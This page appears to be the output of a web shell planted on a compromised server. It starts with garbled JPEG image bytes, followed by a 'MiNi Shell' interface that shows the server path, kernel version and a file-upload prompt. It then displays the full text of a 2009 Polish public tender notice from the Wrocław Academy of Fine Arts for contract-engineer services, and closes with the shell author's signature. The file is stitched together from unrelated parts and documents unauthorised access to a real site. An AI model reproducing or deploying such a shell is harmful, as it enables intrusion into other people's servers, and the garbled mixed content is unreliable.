JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091005/169925-N-2009.html

<p class="kh_header"><b>Wrocław: Pełnienie funkcji Inżyniera Kontraktu dla przedsięwzięcia budowlanego pn.:
BUDOWA AKADEMII SZTUK PIĘKNYCH WE WROCŁAWIU. CENTRUM SZTUK UŻYTKOWYCH. CENTRUM INNOWACYJNOŚCI.</b><br>
<b>Numer ogłoszenia: 169925 - 2009; data zamieszczenia: 05.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu , pl. Polski 3/4, 50-156 Wrocław, woj. dolnośląskie, tel. 071 3438031 w. 233, faks 071 3431558.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu dla przedsięwzięcia budowlanego pn.:
BUDOWA AKADEMII SZTUK PIĘKNYCH WE WROCŁAWIU. CENTRUM SZTUK UŻYTKOWYCH. CENTRUM INNOWACYJNOŚCI..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest usługa polegająca na:
Pełnieniu funkcji Inżyniera Kontraktu dla przedsięwzięcia budowlanego pn. BUDOWA AKADEMII SZTUK PIĘKNYCH WE WROCŁAWIU. CENTRUM SZTUK UŻYTKOWYCH. CENTRUM INNOWACYJNOŚCI w oparciu o Warunki Kontraktowe dla budowy dla robót inżynieryjnych i budowlanych projektowanych przez Zamawiającego FIDIC; 3. wydanie angielsko-polskie niezmienione 2005 (tłumaczenie 1 wydania 1999) (czerwona książka) i zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U z 2006 r. nr 156 poz. 1118).
Szczegółowy opis przedmiotu zamówienia przedstawiony został w Części 3 SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium
1. Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w wysokości: 10000 zł (słownie: dziesięć tysięcy złotych).
2. Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu,
2) gwarancjach bankowych,
3) gwarancjach ubezpieczeniowych,
4) poręczeniach bankowych lub
5) poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
6) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
3. Wadium musi być wniesione przed upływem terminu składania ofert na cały okres ważności oferty i nie może zawierać żadnych ograniczeń sprzecznych z ustawą w szczególności ograniczających
możliwość zrealizowania praw określonych w art. 46 ust. 4a i ust. 5 ustawy - Pzp.
4.Wadium wnoszone w pieniądzu należy przelać na następujący rachunek Zamawiającego: z podaniem nazwy przetargu:
ING Bank Śląski S.A. O/Wrocław
93105015751000000502696594
5. Wniesienie wadium w pieniądzu w formie przelewu bankowego Zamawiający będzie uważał za
skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał
taki przelew przed upływem terminu składania ofert.
6. Potwierdzenie wniesienia wadium należy dołączyć do oferty. Wymagane jest doręczenie oryginału dokumentu, a w przypadku przelewu - kopii dowodu wykonanej operacji.
7. Jeżeli wadium wnoszone będzie w formach wymienionych w ust. 2 pkt. 2) - 6), winno być wystawione na Zamawiającego, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie Zamawiającego. 
Oryginał dokumentu wadialnego ma być zdeponowany w Kasie Akademii Sztuk Pięknych we Wrocławiu pl. Polski 3/4. Do oferty należy załączyć potwierdzoną za zgodność z oryginałem kserokopię dokumentu wadialnego.
Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ustawy - Pzp.
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie,o którym mowa w art. 26 ust. 3, nie złożył dokumentów i oświadczeń, o których mowa w art. 25 ust.1 lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
9. Zamawiający zatrzymuje również wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.
1) wykonali w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jedną usługę, której przedmiotem było pełnienie roli Inżyniera-Inwestora Zastępczego:
- zgodnie z warunkami kontraktowymi FIDIC;
- przy realizacji inwestycji polegającej na budowie lub remoncie obiektu użyteczności
publicznej o kubaturze min. 30 000 m3,
- współfinansowanej z środków unijnych,
- o wartości usługi ( Inżyniera) min. 500000 zł ( brutto).
Rekomendowana przez Wykonawcę usługa musi spełniać łącznie wszystkie wymienione
powyżej parametry.
2) dysponują następującymi osobami lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia następujących osób:
a) inżynier rezydent (koordynator) - posiadający:
- aktualny wpis na listę członków właściwej izby samorządu zawodowego oraz
uprawnienia bez ograniczeń do kierowania robotami budowlanymi,
- min. 5-letnie doświadczenie zawodowe jako kierownik budowy lub inspektor nadzoru,
- doświadczenie w kierowaniu lub nadzorowaniu co najmniej jednej inwestycji
finansowanej ze środków unijnych, według warunków kontraktowych FIDIC;
b) inspektorzy nadzoru - posiadający:
- min. 3-letnie doświadczenie zawodowe jako inspektor nadzoru,
- doświadczenie w prowadzeniu w co najmniej 1 nadzoru w swojej branży przy budowie
obiektów kubaturowych, o kubaturze nie mniejszej niż 30 000 m3.
- aktualny wpis na listę członków właściwej izby samorządu zawodowego oraz
uprawnienia bez ograniczeń do kierowania robotami budowlanymi w następujących
specjalnościach:
- konstrukcyjno-budowlanej,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,
wodociągowych i kanalizacyjnych,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i
elektroenergetycznych,
c) specjalista ds. rozliczeń finansowych - posiadający:
- wykształcenie techniczne lub ekonomiczne,
- min. 3-letnie doświadczenie zawodowe,
- doświadczenie w prowadzeniu rozliczania robot budowlano-montażowych, w co
najmniej jednym projekcie na roboty budowlane, współfinansowanym ze środków
Unii Europejskiej,
d) specjalista ds. zamówień publicznych - posiadający min. 3-letnie doświadczenie
zawodowe, w tym doświadczenie w zakresie przygotowania min. 1 dokumentacji
przetargowej dla kontraktów realizowanych w oparciu o warunki kontraktowe FIDIC;
e) specjalista ds. raportowania - posiadający min. 3-letnie doświadczenie zawodowe, w tym doświadczenie w sporządzaniu raportów w min. 1 projekcie unijnym zgodnie z
wymogami dotyczącymi funduszy unijnych;
f) specjalista-kosztorysant - posiadający min. 3-letnie doświadczenie zawodowe, w tym
doświadczenie w wykonywaniu obmiarów i rozliczaniu robót budowlanych
Zamawiający dopuszcza jednoczesne pełnienie przez 1 osobę kilku wymienionych powyżej
funkcji, pod warunkiem jednoczesnego posiadania odpowiedniego wykształcenia,
doświadczenia, uprawnień i aktualnych wpisów na listę członków właściwej izby samorządu zawodowego.
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Zamawiający uzna warunki za spełnione, gdy:
1) Wykonawca przedłoży wszystkie wymagane dokumenty.
2) przedłożone dokumenty będą zgodne z wymogami:
- rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie
rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz
form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605, zm. Dz.
U. z 2008r, Nr 188, poz. 1155),
- Specyfikacji Istotnych Warunków Zamówienia.
2. Spełnienie warunków, o których mowa powyżej, stanowić będzie podstawę dopuszczenia złożonej oferty do badania pod kątem spełnienia wymagań merytorycznych i technicznych oferowanego przedmiotu zamówienia, a w przypadku pozytywnego wyniku tego badania do oceny według wskazanych w SIWZ kryteriów oceny ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawcy w celu potwierdzenia posiadania uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz nie podlegania wykluczeniu na podstawie art. 24 ustawy - Pzp zobowiązani są przedłożyć następujące dokumenty:
1) oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie ze wzorem
określonym w załączniku nr 2 do  IDW,
2) oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania, zgodnie ze
wzorem określonym w załączniku nr 3 do IDW,
3) aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do
ewidencji działalności gospodarczej lub zgłoszenie do ewidencji działalności
gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert;
4) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz
właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego
Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie
zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i
społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie,
odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące
przed upływem terminu składania ofert;
5) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.
24 ust. 1 pkt. 4-8 ustawy-Pzp, wystawiona nie wcześniej niż 6 miesięcy przed
upływem terminu składania ofert;
6) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.
24 ust. 1 pkt 9 ustawy-Pzp, wystawiona nie wcześniej niż 6 miesięcy przed upływem
terminu składania ofert.
2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia:
1) w przypadku wspólnego ubiegania się o udzielenie zamówienia, Wykonawcy
ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie
zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie
zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z
Wykonawców wspólnie ubiegających się o udzielenie zamówienia;
2) dokumenty określone w ust. 1 pkt 2, 3, 4 i 5, 6 dotyczą każdego Wykonawcy
indywidualnie.
3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w ust. 1:
1) pkt 3, 4 i 6 - składa dokument lub dokumenty, wystawione w kraju, w którym ma
siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawione nie
wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie
społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie,
odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące
przed upływem terminu składania ofert),
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie (wystawione
nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert);
2) pkt 5 - składa zaświadczenie (wystawione nie wcześniej niż 6 miesięcy przed
upływem terminu składania ofert) właściwego organu sądowego lub
administracyjnego kraju pochodzenia albo zamieszkania osoby, której
dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Pzp.
4. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 3, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania stosując odpowiednio zapisy o terminie ich wystawienia.
5. Wykonawcy w celu potwierdzenia posiadania niezbędnej wiedzy i doświadczenia oraz
dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia
zobowiązani są przedłożyć następujące dokumenty:
1) wykaz osób, którymi dysponuje lub będzie dysponował - wykonawca i które będą
uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności; Wykaz, należy sporządzić zgodnie ze wzorem określonym w załączniku nr 4 do IDW, zamieszczone informacje w sposób bezsporny muszą potwierdzać spełnianie warunku..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.asp.wroc.pl/przetargi.htm.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu pl.Polski 3/4, 50-156 Wrocław, pok. nr 215a, II piętro..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2009 godzina 10:00, miejsce: Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu pl.
Polski 3/4, 50-156 Wrocław, pok. nr 107, I piętro..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający ubiega się o współfinansowanie niniejszego przedsięwzięcia z środków
wspólnotowych w ramach PROGRAMU OPERACYJNEGO: INFRASTRUKTURA I
ŚRODOWISKO, PRIORYTET XI: KULTURA I DZIEDZICTWO KULTUROWE, Działania 11.3:

Creat By MiNi SheLL
Email: jattceo@gmail.com